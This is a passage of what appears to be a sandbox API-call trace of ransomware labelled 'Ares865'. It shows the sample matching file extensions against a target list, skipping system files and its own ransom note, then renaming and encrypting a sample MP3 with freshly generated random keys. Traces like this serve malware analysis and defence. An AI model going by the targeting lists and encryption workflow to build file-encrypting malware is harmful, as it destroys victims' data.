(lpString1="mp3", lpString2="vhd") returned -1 [0051.851] lstrlenW (lpString="vhdx") returned 4 [0051.851] lstrcmpiW (lpString1=".mp3", lpString2="vhdx") returned -1 [0051.851] lstrlenW (lpString="avhd") returned 4 [0051.851] lstrcmpiW (lpString1=".mp3", lpString2="avhd") returned -1 [0051.852] lstrlenW (lpString="db") returned 2 [0051.852] lstrcmpiW (lpString1="p3", lpString2="db") returned 1 [0051.852] lstrlenW (lpString="db2") returned 3 [0051.852] lstrcmpiW (lpString1="mp3", lpString2="db2") returned 1 [0051.852] lstrlenW (lpString="db3") returned 3 [0051.852] lstrcmpiW (lpString1="mp3", lpString2="db3") returned 1 [0051.852] lstrlenW (lpString="dbf") returned 3 [0051.852] lstrcmpiW (lpString1="mp3", lpString2="dbf") returned 1 [0051.852] lstrlenW (lpString="mdf") returned 3 [0051.852] lstrcmpiW (lpString1="mp3", lpString2="mdf") returned 1 [0051.852] lstrlenW (lpString="mdb") returned 3 [0051.852] lstrcmpiW (lpString1="mp3", lpString2="mdb") returned 1 [0051.852] lstrlenW (lpString="sql") returned 3 [0051.852] lstrcmpiW (lpString1="mp3", lpString2="sql") returned -1 [0051.852] lstrlenW (lpString="sqlite") returned 6 [0051.852] lstrcmpiW (lpString1="ir.mp3", lpString2="sqlite") returned -1 [0051.852] lstrlenW (lpString="sqlite3") returned 7 [0051.852] lstrcmpiW (lpString1="air.mp3", lpString2="sqlite3") returned -1 [0051.852] lstrlenW (lpString="sqlitedb") returned 8 [0051.852] lstrcmpiW (lpString1="Hair.mp3", lpString2="sqlitedb") returned -1 [0051.852] lstrlenW (lpString="xml") returned 3 [0051.852] lstrcmpiW (lpString1="mp3", lpString2="xml") returned -1 [0051.852] lstrlenW (lpString="$er") returned 3 [0051.852] lstrcmpiW (lpString1="mp3", lpString2="$er") returned 1 [0051.852] lstrlenW (lpString="4dd") returned 3 [0051.852] lstrcmpiW (lpString1="mp3", lpString2="4dd") returned 1 [0051.852] lstrlenW (lpString="4dl") returned 3 [0051.852] lstrcmpiW (lpString1="mp3", lpString2="4dl") returned 1 [0051.852] lstrlenW (lpString="^^^") returned 3 [0051.852] lstrcmpiW (lpString1="mp3", lpString2="^^^") returned 1 [0051.852] lstrlenW (lpString="abs") returned 3 [0051.852] lstrcmpiW (lpString1="mp3", lpString2="abs") returned 1 [0051.852] lstrlenW (lpString="abx") returned 3 [0051.852] lstrcmpiW (lpString1="mp3", lpString2="abx") returned 1 [0051.852] lstrlenW (lpString="accdb") returned 5 [0051.852] lstrcmpiW (lpString1="r.mp3", lpString2="accdb") returned 1 [0051.852] lstrlenW (lpString="accdc") returned 5 [0051.852] lstrcmpiW (lpString1="r.mp3", lpString2="accdc") returned 1 [0051.852] lstrlenW (lpString="accde") returned 5 [0051.853] lstrcmpiW (lpString1="r.mp3", lpString2="accde") returned 1 [0051.853] lstrlenW (lpString="accdr") returned 5 [0052.004] lstrcmpiW (lpString1="r.mp3", lpString2="accdr") returned 1 [0052.004] lstrlenW (lpString="accdt") returned 5 [0052.004] lstrcmpiW (lpString1="r.mp3", lpString2="accdt") returned 1 [0052.005] lstrlenW (lpString="accdw") returned 5 [0052.005] lstrcmpiW (lpString1="r.mp3", lpString2="accdw") returned 1 [0052.005] lstrlenW (lpString="accft") returned 5 [0052.005] lstrcmpiW (lpString1="r.mp3", lpString2="accft") returned 1 [0052.005] lstrlenW (lpString="adb") returned 3 [0052.005] lstrcmpiW (lpString1="mp3", lpString2="adb") returned 1 [0052.005] lstrlenW (lpString="adb") returned 3 [0052.005] lstrcmpiW (lpString1="mp3", lpString2="adb") returned 1 [0052.005] lstrlenW (lpString="ade") returned 3 [0052.005] lstrcmpiW (lpString1="mp3", lpString2="ade") returned 1 [0052.005] lstrlenW (lpString="adf") returned 3 [0052.005] lstrcmpiW (lpString1="mp3", lpString2="adf") returned 1 [0052.005] lstrlenW (lpString="adn") returned 3 [0052.005] lstrcmpiW (lpString1="mp3", lpString2="adn") returned 1 [0052.005] lstrlenW (lpString="adp") returned 3 [0052.005] lstrcmpiW (lpString1="mp3", lpString2="adp") returned 1 [0052.005] lstrlenW (lpString="alf") returned 3 [0052.005] lstrcmpiW (lpString1="mp3", lpString2="alf") returned 1 [0052.005] lstrlenW (lpString="ask") returned 3 [0052.005] lstrcmpiW (lpString1="mp3", lpString2="ask") returned 1 [0052.005] lstrlenW (lpString="btr") returned 3 [0052.005] lstrcmpiW (lpString1="mp3", lpString2="btr") returned 1 [0052.005] lstrlenW (lpString="cat") returned 3 [0052.005] lstrcmpiW (lpString1="mp3", lpString2="cat") returned 1 [0052.005] lstrlenW (lpString="cdb") returned 3 [0052.005] lstrcmpiW (lpString1="mp3", lpString2="cdb") returned 1 [0052.005] lstrlenW (lpString="ckp") returned 3 [0052.005] lstrcmpiW (lpString1="mp3", lpString2="ckp") returned 1 [0052.005] lstrlenW (lpString="cma") returned 3 [0052.005] lstrcmpiW (lpString1="mp3", lpString2="cma") returned 1 [0052.005] lstrlenW (lpString="cpd") returned 3 [0052.005] lstrcmpiW (lpString1="mp3", lpString2="cpd") returned 1 [0052.005] lstrlenW (lpString="dacpac") returned 6 [0052.005] lstrcmpiW (lpString1="ir.mp3", lpString2="dacpac") returned 1 [0052.005] lstrlenW (lpString="dad") returned 3 [0052.005] lstrcmpiW (lpString1="mp3", lpString2="dad") returned 1 [0052.005] lstrlenW (lpString="dadiagrams") returned 10 [0052.006] lstrcmpiW (lpString1="n Hair.mp3", lpString2="dadiagrams") returned 1 [0052.006] lstrlenW (lpString="daschema") returned 8 [0052.006] lstrcmpiW (lpString1="Hair.mp3", lpString2="daschema") returned 1 [0052.006] lstrlenW (lpString="db-journal") returned 10 [0052.006] lstrcmpiW (lpString1="n Hair.mp3", lpString2="db-journal") returned 1 [0052.006] lstrlenW (lpString="db-shm") returned 6 [0052.006] lstrcmpiW (lpString1="ir.mp3", lpString2="db-shm") returned 1 [0052.006] lstrlenW (lpString="db-wal") returned 6 [0052.006] lstrcmpiW (lpString1="ir.mp3", lpString2="db-wal") returned 1 [0052.006] lstrlenW (lpString="dbc") returned 3 [0052.006] lstrcmpiW (lpString1="mp3", lpString2="dbc") returned 1 [0052.006] lstrlenW (lpString="dbs") returned 3 [0052.006] lstrcmpiW (lpString1="mp3", lpString2="dbs") returned 1 [0052.006] lstrlenW (lpString="dbt") returned 3 [0052.006] lstrcmpiW (lpString1="mp3", lpString2="dbt") returned 1 [0052.006] lstrlenW (lpString="dbv") returned 3 [0052.006] lstrcmpiW (lpString1="mp3", lpString2="dbv") returned 1 [0052.006] lstrlenW (lpString="dbx") returned 3 [0052.006] lstrcmpiW (lpString1="mp3", lpString2="dbx") returned 1 [0052.006] lstrlenW (lpString="dcb") returned 3 [0052.006] lstrcmpiW (lpString1="mp3", lpString2="dcb") returned 1 [0052.006] lstrlenW (lpString="dct") returned 3 [0052.006] lstrcmpiW (lpString1="mp3", lpString2="dct") returned 1 [0052.006] lstrlenW (lpString="dcx") returned 3 [0052.006] lstrcmpiW (lpString1="mp3", lpString2="dcx") returned 1 [0052.006] lstrlenW (lpString="ddl") returned 3 [0052.006] lstrcmpiW (lpString1="mp3", lpString2="ddl") returned 1 [0052.006] lstrlenW (lpString="dlis") returned 4 [0052.006] lstrcmpiW (lpString1=".mp3", lpString2="dlis") returned -1 [0052.006] lstrlenW (lpString="dp1") returned 3 [0052.006] lstrcmpiW (lpString1="mp3", lpString2="dp1") returned 1 [0052.006] lstrlenW (lpString="dqy") returned 3 [0052.006] lstrcmpiW (lpString1="mp3", lpString2="dqy") returned 1 [0052.006] lstrlenW (lpString="dsk") returned 3 [0052.006] lstrcmpiW (lpString1="mp3", lpString2="dsk") returned 1 [0052.007] lstrlenW (lpString="dsn") returned 3 [0052.007] lstrcmpiW (lpString1="mp3", lpString2="dsn") returned 1 [0052.007] lstrlenW (lpString="dtsx") returned 4 [0052.007] lstrcmpiW (lpString1=".mp3", lpString2="dtsx") returned -1 [0052.007] lstrlenW (lpString="dxl") returned 3 [0052.007] lstrcmpiW (lpString1="mp3", lpString2="dxl") returned 1 [0052.007] lstrlenW (lpString="eco") returned 3 [0052.007] lstrcmpiW (lpString1="mp3", lpString2="eco") returned 1 [0052.007] lstrlenW (lpString="ecx") returned 3 [0052.007] lstrcmpiW (lpString1="mp3", lpString2="ecx") returned 1 [0052.007] lstrlenW (lpString="edb") returned 3 [0052.007] lstrcmpiW (lpString1="mp3", lpString2="edb") returned 1 [0052.007] lstrlenW (lpString="epim") returned 4 [0052.007] lstrcmpiW (lpString1=".mp3", lpString2="epim") returned -1 [0052.007] lstrlenW (lpString="fcd") returned 3 [0052.007] lstrcmpiW (lpString1="mp3", lpString2="fcd") returned 1 [0052.007] lstrlenW (lpString="fdb") returned 3 [0052.007] lstrcmpiW (lpString1="mp3", lpString2="fdb") returned 1 [0052.007] lstrlenW (lpString="fic") returned 3 [0052.007] lstrcmpiW (lpString1="mp3", lpString2="fic") returned 1 [0052.007] lstrlenW (lpString="flexolibrary") returned 12 [0052.007] lstrcmpiW (lpString1="xen Hair.mp3", lpString2="flexolibrary") returned 1 [0052.007] lstrlenW (lpString="fm5") returned 3 [0052.007] lstrcmpiW (lpString1="mp3", lpString2="fm5") returned 1 [0052.007] lstrlenW (lpString="fmp") returned 3 [0052.007] lstrcmpiW (lpString1="mp3", lpString2="fmp") returned 1 [0052.007] lstrlenW (lpString="fmp12") returned 5 [0052.007] lstrcmpiW (lpString1="r.mp3", lpString2="fmp12") returned 1 [0052.007] lstrlenW (lpString="fmpsl") returned 5 [0052.007] lstrcmpiW (lpString1="r.mp3", lpString2="fmpsl") returned 1 [0052.007] lstrlenW (lpString="fol") returned 3 [0052.007] lstrcmpiW (lpString1="mp3", lpString2="fol") returned 1 [0052.007] lstrlenW (lpString="fp3") returned 3 [0052.007] lstrcmpiW (lpString1="mp3", lpString2="fp3") returned 1 [0052.007] lstrlenW (lpString="fp4") returned 3 [0052.007] lstrcmpiW (lpString1="mp3", lpString2="fp4") returned 1 [0052.007] lstrlenW (lpString="fp5") returned 3 [0052.008] lstrcmpiW (lpString1="mp3", lpString2="fp5") returned 1 [0052.008] lstrlenW (lpString="fp7") returned 3 [0052.008] lstrcmpiW (lpString1="mp3", lpString2="fp7") returned 1 [0052.008] lstrlenW (lpString="fpt") returned 3 [0052.008] lstrcmpiW (lpString1="mp3", lpString2="fpt") returned 1 [0052.008] lstrlenW (lpString="frm") returned 3 [0052.008] lstrcmpiW (lpString1="mp3", lpString2="frm") returned 1 [0052.008] lstrlenW (lpString="gdb") returned 3 [0052.008] lstrcmpiW (lpString1="mp3", lpString2="gdb") returned 1 [0052.008] lstrlenW (lpString="gdb") returned 3 [0052.008] lstrcmpiW (lpString1="mp3", lpString2="gdb") returned 1 [0052.008] lstrlenW (lpString="grdb") returned 4 [0052.008] lstrcmpiW (lpString1=".mp3", lpString2="grdb") returned -1 [0052.008] lstrlenW (lpString="gwi") returned 3 [0052.008] lstrcmpiW (lpString1="mp3", lpString2="gwi") returned 1 [0052.008] lstrlenW (lpString="hdb") returned 3 [0052.008] lstrcmpiW (lpString1="mp3", lpString2="hdb") returned 1 [0052.008] lstrlenW (lpString="his") returned 3 [0052.008] lstrcmpiW (lpString1="mp3", lpString2="his") returned 1 [0052.008] lstrlenW (lpString="ib") returned 2 [0052.008] lstrcmpiW (lpString1="p3", lpString2="ib") returned 1 [0052.008] lstrlenW (lpString="idb") returned 3 [0052.008] lstrcmpiW (lpString1="mp3", lpString2="idb") returned 1 [0052.008] lstrlenW (lpString="ihx") returned 3 [0052.008] lstrcmpiW (lpString1="mp3", lpString2="ihx") returned 1 [0052.008] lstrlenW (lpString="itdb") returned 4 [0052.008] lstrcmpiW (lpString1=".mp3", lpString2="itdb") returned -1 [0052.008] lstrlenW (lpString="itw") returned 3 [0052.008] lstrcmpiW (lpString1="mp3", lpString2="itw") returned 1 [0052.008] lstrlenW (lpString="jet") returned 3 [0052.008] lstrcmpiW (lpString1="mp3", lpString2="jet") returned 1 [0052.008] lstrlenW (lpString="jtx") returned 3 [0052.008] lstrcmpiW (lpString1="mp3", lpString2="jtx") returned 1 [0052.008] lstrlenW (lpString="kdb") returned 3 [0052.008] lstrcmpiW (lpString1="mp3", lpString2="kdb") returned 1 [0052.008] lstrlenW (lpString="kexi") returned 4 [0052.008] lstrcmpiW (lpString1=".mp3", lpString2="kexi") returned -1 [0052.008] lstrlenW (lpString="kexic") returned 5 [0052.009] lstrcmpiW (lpString1="r.mp3", lpString2="kexic") returned 1 [0052.009] lstrlenW (lpString="kexis") returned 5 [0052.009] lstrcmpiW (lpString1="r.mp3", lpString2="kexis") returned 1 [0052.009] lstrlenW (lpString="lgc") returned 3 [0052.009] lstrcmpiW (lpString1="mp3", lpString2="lgc") returned 1 [0052.009] lstrlenW (lpString="lwx") returned 3 [0052.009] lstrcmpiW (lpString1="mp3", lpString2="lwx") returned 1 [0052.009] lstrlenW (lpString="maf") returned 3 [0052.009] lstrcmpiW (lpString1="mp3", lpString2="maf") returned 1 [0052.009] lstrlenW (lpString="maq") returned 3 [0052.009] lstrcmpiW (lpString1="mp3", lpString2="maq") returned 1 [0052.009] lstrlenW (lpString="mar") returned 3 [0052.009] lstrcmpiW (lpString1="mp3", lpString2="mar") returned 1 [0052.009] lstrlenW (lpString="marshal") returned 7 [0052.009] lstrcmpiW (lpString1="air.mp3", lpString2="marshal") returned -1 [0052.009] lstrlenW (lpString="mas") returned 3 [0052.009] lstrcmpiW (lpString1="mp3", lpString2="mas") returned 1 [0052.009] lstrlenW (lpString="mav") returned 3 [0052.009] lstrcmpiW (lpString1="mp3", lpString2="mav") returned 1 [0052.009] lstrlenW (lpString="maw") returned 3 [0052.009] lstrcmpiW (lpString1="mp3", lpString2="maw") returned 1 [0052.009] lstrlenW (lpString="mdbhtml") returned 7 [0052.009] lstrcmpiW (lpString1="air.mp3", lpString2="mdbhtml") returned -1 [0052.009] lstrlenW (lpString="mdn") returned 3 [0052.009] lstrcmpiW (lpString1="mp3", lpString2="mdn") returned 1 [0052.009] lstrlenW (lpString="mdt") returned 3 [0052.009] lstrcmpiW (lpString1="mp3", lpString2="mdt") returned 1 [0052.009] lstrlenW (lpString="mfd") returned 3 [0052.009] lstrcmpiW (lpString1="mp3", lpString2="mfd") returned 1 [0052.009] lstrlenW (lpString="mpd") returned 3 [0052.009] lstrcmpiW (lpString1="mp3", lpString2="mpd") returned -1 [0052.009] lstrlenW (lpString="mrg") returned 3 [0052.009] lstrcmpiW (lpString1="mp3", lpString2="mrg") returned -1 [0052.009] lstrlenW (lpString="mud") returned 3 [0052.009] lstrcmpiW (lpString1="mp3", lpString2="mud") returned -1 [0052.009] lstrlenW (lpString="mwb") returned 3 [0052.009] lstrcmpiW (lpString1="mp3", lpString2="mwb") returned -1 [0052.010] lstrlenW (lpString="myd") returned 3 [0052.010] lstrcmpiW (lpString1="mp3", lpString2="myd") returned -1 [0052.010] lstrlenW (lpString="ndf") returned 3 [0052.010] lstrcmpiW (lpString1="mp3", lpString2="ndf") returned -1 [0052.010] lstrlenW (lpString="nnt") returned 3 [0052.010] lstrcmpiW (lpString1="mp3", lpString2="nnt") returned -1 [0052.010] lstrlenW (lpString="nrmlib") returned 6 [0052.010] lstrcmpiW (lpString1="ir.mp3", lpString2="nrmlib") returned -1 [0052.010] lstrlenW (lpString="ns2") returned 3 [0052.010] lstrcmpiW (lpString1="mp3", lpString2="ns2") returned -1 [0052.010] lstrlenW (lpString="ns3") returned 3 [0052.010] lstrcmpiW (lpString1="mp3", lpString2="ns3") returned -1 [0052.010] lstrlenW (lpString="ns4") returned 3 [0052.010] lstrcmpiW (lpString1="mp3", lpString2="ns4") returned -1 [0052.010] lstrlenW (lpString="nsf") returned 3 [0052.010] lstrcmpiW (lpString1="mp3", lpString2="nsf") returned -1 [0052.010] lstrlenW (lpString="nv") returned 2 [0052.010] lstrcmpiW (lpString1="p3", lpString2="nv") returned 1 [0052.010] lstrlenW (lpString="nv2") returned 3 [0052.010] lstrcmpiW (lpString1="mp3", lpString2="nv2") returned -1 [0052.010] lstrlenW (lpString="nwdb") returned 4 [0052.010] lstrcmpiW (lpString1=".mp3", lpString2="nwdb") returned -1 [0052.010] lstrlenW (lpString="nyf") returned 3 [0052.010] lstrcmpiW (lpString1="mp3", lpString2="nyf") returned -1 [0052.010] lstrlenW (lpString="odb") returned 3 [0052.010] lstrcmpiW (lpString1="mp3", lpString2="odb") returned -1 [0052.010] lstrlenW (lpString="odb") returned 3 [0052.010] lstrcmpiW (lpString1="mp3", lpString2="odb") returned -1 [0052.010] lstrlenW (lpString="oqy") returned 3 [0052.010] lstrcmpiW (lpString1="mp3", lpString2="oqy") returned -1 [0052.010] lstrlenW (lpString="ora") returned 3 [0052.010] lstrcmpiW (lpString1="mp3", lpString2="ora") returned -1 [0052.010] lstrlenW (lpString="orx") returned 3 [0052.010] lstrcmpiW (lpString1="mp3", lpString2="orx") returned -1 [0052.010] lstrlenW (lpString="owc") returned 3 [0052.010] lstrcmpiW (lpString1="mp3", lpString2="owc") returned -1 [0052.010] lstrlenW (lpString="p96") returned 3 [0052.011] lstrcmpiW (lpString1="mp3", lpString2="p96") returned -1 [0052.011] lstrlenW (lpString="p97") returned 3 [0052.011] lstrcmpiW (lpString1="mp3", lpString2="p97") returned -1 [0052.011] lstrlenW (lpString="pan") returned 3 [0052.011] lstrcmpiW (lpString1="mp3", lpString2="pan") returned -1 [0052.011] lstrlenW (lpString="pdb") returned 3 [0052.011] lstrcmpiW (lpString1="mp3", lpString2="pdb") returned -1 [0052.011] lstrlenW (lpString="pdm") returned 3 [0052.011] lstrcmpiW (lpString1="mp3", lpString2="pdm") returned -1 [0052.011] lstrlenW (lpString="pnz") returned 3 [0052.011] lstrcmpiW (lpString1="mp3", lpString2="pnz") returned -1 [0052.011] lstrlenW (lpString="qry") returned 3 [0052.011] lstrcmpiW (lpString1="mp3", lpString2="qry") returned -1 [0052.011] lstrlenW (lpString="qvd") returned 3 [0052.011] lstrcmpiW (lpString1="mp3", lpString2="qvd") returned -1 [0052.011] lstrlenW (lpString="rbf") returned 3 [0052.011] lstrcmpiW (lpString1="mp3", lpString2="rbf") returned -1 [0052.011] lstrlenW (lpString="rctd") returned 4 [0052.011] lstrcmpiW (lpString1=".mp3", lpString2="rctd") returned -1 [0052.011] lstrlenW (lpString="rod") returned 3 [0052.011] lstrcmpiW (lpString1="mp3", lpString2="rod") returned -1 [0052.011] lstrlenW (lpString="rodx") returned 4 [0052.011] lstrcmpiW (lpString1=".mp3", lpString2="rodx") returned -1 [0052.011] lstrlenW (lpString="rpd") returned 3 [0052.011] lstrcmpiW (lpString1="mp3", lpString2="rpd") returned -1 [0052.011] lstrlenW (lpString="rsd") returned 3 [0052.011] lstrcmpiW (lpString1="mp3", lpString2="rsd") returned -1 [0052.011] lstrlenW (lpString="sas7bdat") returned 8 [0052.011] lstrcmpiW (lpString1="Hair.mp3", lpString2="sas7bdat") returned -1 [0052.011] lstrlenW (lpString="sbf") returned 3 [0052.011] lstrcmpiW (lpString1="mp3", lpString2="sbf") returned -1 [0052.011] lstrlenW (lpString="scx") returned 3 [0052.011] lstrcmpiW (lpString1="mp3", lpString2="scx") returned -1 [0052.011] lstrlenW (lpString="sdb") returned 3 [0052.011] lstrcmpiW (lpString1="mp3", lpString2="sdb") returned -1 [0052.011] lstrlenW (lpString="sdc") returned 3 [0052.011] lstrcmpiW (lpString1="mp3", lpString2="sdc") returned -1 [0052.012] lstrlenW (lpString="sdf") returned 3 [0052.012] lstrcmpiW (lpString1="mp3", lpString2="sdf") returned -1 [0052.012] lstrlenW (lpString="sis") returned 3 [0052.012] lstrcmpiW (lpString1="mp3", lpString2="sis") returned -1 [0052.012] lstrlenW (lpString="spq") returned 3 [0052.012] lstrcmpiW (lpString1="mp3", lpString2="spq") returned -1 [0052.012] lstrlenW (lpString="te") returned 2 [0052.012] lstrcmpiW (lpString1="p3", lpString2="te") returned -1 [0052.012] lstrlenW (lpString="teacher") returned 7 [0052.012] lstrcmpiW (lpString1="air.mp3", lpString2="teacher") returned -1 [0052.012] lstrlenW (lpString="tmd") returned 3 [0052.012] lstrcmpiW (lpString1="mp3", lpString2="tmd") returned -1 [0052.012] lstrlenW (lpString="tps") returned 3 [0052.012] lstrcmpiW (lpString1="mp3", lpString2="tps") returned -1 [0052.012] lstrlenW (lpString="trc") returned 3 [0052.012] lstrcmpiW (lpString1="mp3", lpString2="trc") returned -1 [0052.012] lstrlenW (lpString="trc") returned 3 [0052.012] lstrcmpiW (lpString1="mp3", lpString2="trc") returned -1 [0052.012] lstrlenW (lpString="trm") returned 3 [0052.012] lstrcmpiW (lpString1="mp3", lpString2="trm") returned -1 [0052.012] lstrlenW (lpString="udb") returned 3 [0052.012] lstrcmpiW (lpString1="mp3", lpString2="udb") returned -1 [0052.012] lstrlenW (lpString="udl") returned 3 [0052.012] lstrcmpiW (lpString1="mp3", lpString2="udl") returned -1 [0052.012] lstrlenW (lpString="usr") returned 3 [0052.012] lstrcmpiW (lpString1="mp3", lpString2="usr") returned -1 [0052.012] lstrlenW (lpString="v12") returned 3 [0052.012] lstrcmpiW (lpString1="mp3", lpString2="v12") returned -1 [0052.012] lstrlenW (lpString="vis") returned 3 [0052.012] lstrcmpiW (lpString1="mp3", lpString2="vis") returned -1 [0052.012] lstrlenW (lpString="vpd") returned 3 [0052.012] lstrcmpiW (lpString1="mp3", lpString2="vpd") returned -1 [0052.012] lstrlenW (lpString="vvv") returned 3 [0052.012] lstrcmpiW (lpString1="mp3", lpString2="vvv") returned -1 [0052.012] lstrlenW (lpString="wdb") returned 3 [0052.012] lstrcmpiW (lpString1="mp3", lpString2="wdb") returned -1 [0052.012] lstrlenW (lpString="wmdb") returned 4 [0052.013] lstrcmpiW (lpString1=".mp3", lpString2="wmdb") returned -1 [0052.013] lstrlenW (lpString="wrk") returned 3 [0052.013] lstrcmpiW (lpString1="mp3", lpString2="wrk") returned -1 [0052.013] lstrlenW (lpString="xdb") returned 3 [0052.013] lstrcmpiW (lpString1="mp3", lpString2="xdb") returned -1 [0052.013] lstrlenW (lpString="xld") returned 3 [0052.013] lstrcmpiW (lpString1="mp3", lpString2="xld") returned -1 [0052.013] lstrlenW (lpString="xmlff") returned 5 [0052.013] lstrcmpiW (lpString1="r.mp3", lpString2="xmlff") returned -1 [0052.013] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3.Ares865") returned 72 [0052.013] MoveFileExW (lpExistingFileName="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3" (normalized: "c:\\users\\public\\music\\sample music\\maid with the flaxen hair.mp3"), lpNewFileName="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3.Ares865" (normalized: "c:\\users\\public\\music\\sample music\\maid with the flaxen hair.mp3.ares865"), dwFlags=0x1) returned 1 [0052.013] CreateFileW (lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3.Ares865" (normalized: "c:\\users\\public\\music\\sample music\\maid with the flaxen hair.mp3.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0052.014] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=4113874) returned 1 [0052.014] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0052.014] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d6018 [0052.014] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0052.014] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f05a0) returned 1 [0052.015] CryptGenRandom (in: hProv=0x2f05a0, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0052.015] CryptReleaseContext (hProv=0x2f05a0, dwFlags=0x0) returned 1 [0052.015] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3ec8e0, lpName=0x0) returned 0x118 [0052.022] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x200000, dwNumberOfBytesToMap=0x1ec8e0) returned 0x3240000 [0054.476] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0054.477] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0054.477] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0054.477] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d5ee0 [0054.477] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0054.477] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0054.477] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0054.477] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0054.477] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0054.477] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2cb310 [0054.478] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0054.478] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cb310 | out: hHeap=0x2b0000) returned 1 [0054.478] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0054.478] UnmapViewOfFile (lpBaseAddress=0x3240000) returned 1 [0054.497] CloseHandle (hObject=0x118) returned 1 [0054.497] CloseHandle (hObject=0x164) returned 1 [0054.665] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d6018 | out: hHeap=0x2b0000) returned 1 [0054.665] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0054.665] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0054.678] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x802f4656, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be38a97, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7be38a97, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x49e459, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sleep Away.mp3", cAlternateFileName="SLEEPA~1.MP3")) returned 1 [0054.678] lstrcmpiW (lpString1="Sleep Away.mp3", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0054.678] lstrcmpiW (lpString1="Sleep Away.mp3", lpString2="aoldtz.exe") returned 1 [0054.679] lstrcmpiW (lpString1="Sleep Away.mp3", lpString2=".") returned 1 [0054.679] lstrcmpiW (lpString1="Sleep Away.mp3", lpString2="..") returned 1 [0054.679] lstrcmpiW (lpString1="Sleep Away.mp3", lpString2="windows") returned -1 [0054.679] lstrcmpiW (lpString1="Sleep Away.mp3", lpString2="bootmgr") returned 1 [0054.679] lstrcmpiW (lpString1="Sleep Away.mp3", lpString2="temp") returned -1 [0054.679] lstrcmpiW (lpString1="Sleep Away.mp3", lpString2="pagefile.sys") returned 1 [0054.679] lstrcmpiW (lpString1="Sleep Away.mp3", lpString2="boot") returned 1 [0054.679] lstrcmpiW (lpString1="Sleep Away.mp3", lpString2="ids.txt") returned 1 [0054.679] lstrcmpiW (lpString1="Sleep Away.mp3", lpString2="ntuser.dat") returned 1 [0054.679] lstrcmpiW (lpString1="Sleep Away.mp3", lpString2="perflogs") returned 1 [0054.679] lstrcmpiW (lpString1="Sleep Away.mp3", lpString2="MSBuild") returned 1 [0054.679] lstrlenW (lpString="Sleep Away.mp3") returned 14 [0054.679] lstrlenW (lpString="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3") returned 64 [0054.679] lstrcpyW (in: lpString1=0x2cce446, lpString2="Sleep Away.mp3" | out: lpString1="Sleep Away.mp3") returned="Sleep Away.mp3" [0054.679] lstrlenW (lpString="Sleep Away.mp3") returned 14 [0054.679] lstrlenW (lpString="Ares865") returned 7 [0054.679] lstrcmpiW (lpString1="way.mp3", lpString2="Ares865") returned 1 [0054.679] lstrlenW (lpString=".dll") returned 4 [0054.679] lstrcmpiW (lpString1="Sleep Away.mp3", lpString2=".dll") returned 1 [0054.679] lstrlenW (lpString=".lnk") returned 4 [0054.679] lstrcmpiW (lpString1="Sleep Away.mp3", lpString2=".lnk") returned 1 [0054.679] lstrlenW (lpString=".ini") 